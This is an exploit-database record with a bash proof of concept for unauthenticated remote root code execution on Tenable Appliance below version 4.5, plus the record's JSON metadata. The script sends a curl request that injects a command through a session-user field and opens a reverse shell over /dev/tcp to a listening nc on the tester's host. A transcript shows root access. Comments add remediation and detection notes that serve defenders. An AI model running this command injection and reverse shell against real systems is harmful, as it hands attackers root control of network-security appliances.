ID 1337DAY-ID-27616
Type zdt
Reporter agix
Modified 2017-04-19T00:00:00
Description
Exploit for linux platform in category remote exploits
#!/bin/bash
: '
According to http://static.tenable.com/prod_docs/upgrade_appliance.html they
fixed two security vulnerabilities in the web interface in release 4.5, so I
guess previous versions are also vulnerable.
# Exploit Title: Unauthenticated remote root code execution on Tenable Appliance
# Date: 18/04/17
# Exploit Author: agix
# Vendor Homepage: https://www.tenable.com/
# Version: < 4.5
# Tested on: Tenable Appliance 3.5
tenable $ ./rce.sh
bash: no job control in this shell
bash-3.2# ls
app
appliancelicense.html
appliancelicense.pdf
appliancelicense.txt
images
includes
index.ara
js
lcelicense.html
lcelicense.pdf
lcelicense.txt
migrate
nessuslicense.html
nessuslicense.pdf
nessuslicense.txt
password.ara
pvslicense.html
pvslicense.pdf
pvslicense.txt
sclicense.html
sclicense.pdf
sclicense.txt
simpleupload.py
static
bash-3.2# id
uid=0(root) gid=0(root)
bash-3.2#
'
#!/bin/bash
# Proof-of-concept request against the web interface of a Tenable Appliance
# older than release 4.5 (per the header above; the author tested on 3.5).
# NOTE(review): this second shebang is not the first line of the file, so the
# shell treats it as an ordinary comment.
#
# Defender notes:
#   - The header cites the vendor upgrade notes as fixing the web-interface
#     issues in release 4.5; upgrading is the remediation the page supports.
#   - The request below is sent without any prior login step, so reachability
#     of port 8000 is the only precondition visible here; limit that port to
#     administrative networks.
#   - Detection: POSTs to /simpleupload.py whose tns_appliance_session_user
#     value contains quote characters or an encoded newline (%0a), and
#     outbound TCP connections opened by a shell on the appliance.
#   - The accompanying record lists no CVE and a CVSS score of 0.0 with vector
#     NONE; that is missing data, not a low-severity rating.

# Lab values used by the author (private 172.16.x.x addresses): the appliance
# under test, the tester's own host, and the port the tester listens on.
TENABLE_IP="172.16.171.179"
YOUR_IP="172.16.171.1"
LISTEN_PORT=31337
# -k turns off TLS certificate verification for this request.
# The POST body places a double quote, a single quote and an encoded newline
# (%0a) in tns_appliance_session_user, followed by a shell command line; the
# transcript in the header shows the resulting shell running as uid 0.
# NOTE(review): presumably simpleupload.py hands this field to a shell without
# validation -- the server-side code is not shown here; confirm against the fix.
# The trailing & puts curl in the background so the next line can run.
curl -k "https://$TENABLE_IP:8000/simpleupload.py" --data $'returnpage=/&action=a&tns_appliance_session_token=61:62&tns_appliance_session_user=a"\'%0abash -i >%26 /dev/tcp/'$YOUR_IP'/'$LISTEN_PORT' 0>%261%0aecho '&
# Listener on the tester's host that receives the connection opened by the
# command injected above.
nc -l -p $LISTEN_PORT
# 0day.today [2018-01-01] #
{"sourceData": "#!/bin/bash\r\n: '\r\nAccording to http://static.tenable.com/prod_docs/upgrade_appliance.html they\r\nfixed two security vulnerabilities in the web interface in release 4.5 so I\r\nguess previous version are also vulnerable.\r\n \r\n# Exploit Title: Unauthenticated remote root code execution on Tenable Appliance\r\n# Date: 18/04/17\r\n# Exploit Author: agix\r\n# Vendor Homepage: https://www.tenable.com/\r\n# Version: < 4.5\r\n# Tested on: Tenable Appliance 3.5\r\n \r\ntenable $ ./rce.sh\r\nbash: no job control in this shell\r\nbash-3.2# ls\r\napp\r\nappliancelicense.html\r\nappliancelicense.pdf\r\nappliancelicense.txt\r\nimages\r\nincludes\r\nindex.ara\r\njs\r\nlcelicense.html\r\nlcelicense.pdf\r\nlcelicense.txt\r\nmigrate\r\nnessuslicense.html\r\nnessuslicense.pdf\r\nnessuslicense.txt\r\npassword.ara\r\npvslicense.html\r\npvslicense.pdf\r\npvslicense.txt\r\nsclicense.html\r\nsclicense.pdf\r\nsclicense.txt\r\nsimpleupload.py\r\nstatic\r\nbash-3.2# id\r\nuid=0(root) gid=0(root)\r\nbash-3.2#\r\n'\r\n \r\n#!/bin/bash\r\n \r\nTENABLE_IP=\"172.16.171.179\"\r\nYOUR_IP=\"172.16.171.1\"\r\nLISTEN_PORT=31337\r\n \r\n \r\ncurl -k \"https://$TENABLE_IP:8000/simpleupload.py\" --data $'returnpage=/&action=a&tns_appliance_session_token=61:62&tns_appliance_session_user=a\"\\'%0abash -i >%26 /dev/tcp/'$YOUR_IP'/'$LISTEN_PORT' 0>%261%0aecho '&\r\nnc -l -p $LISTEN_PORT\n\n# 0day.today [2018-01-01] #", "description": "Exploit for linux platform in category remote exploits", "sourceHref": "https://0day.today/exploit/27616", "reporter": "agix", "href": "https://0day.today/exploit/description/27616", "type": "zdt", "viewCount": 10, "references": [], "lastseen": "2018-01-01T15:08:46", "published": "2017-04-19T00:00:00", "cvelist": [], "id": "1337DAY-ID-27616", "modified": "2017-04-19T00:00:00", "title": "Tenable Appliance < 4.5 - Unauthenticated Remote Root Code Execution Exploit", "edition": 1, "cvss": {"score": 0.0, "vector": "NONE"}, "bulletinFamily": "exploit", 
"enchantments": {"score": {"value": -1.4, "vector": "NONE", "modified": "2018-01-01T15:08:46", "rev": 2}, "dependencies": {"references": [{"type": "exploitpack", "idList": ["EXPLOITPACK:7FEAC1003ED794DB62A3CA4F8B075666"]}, {"type": "zdt", "idList": ["1337DAY-ID-33843"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156015"]}], "modified": "2018-01-01T15:08:46", "rev": 2}, "vulnersScore": -1.4}}
{}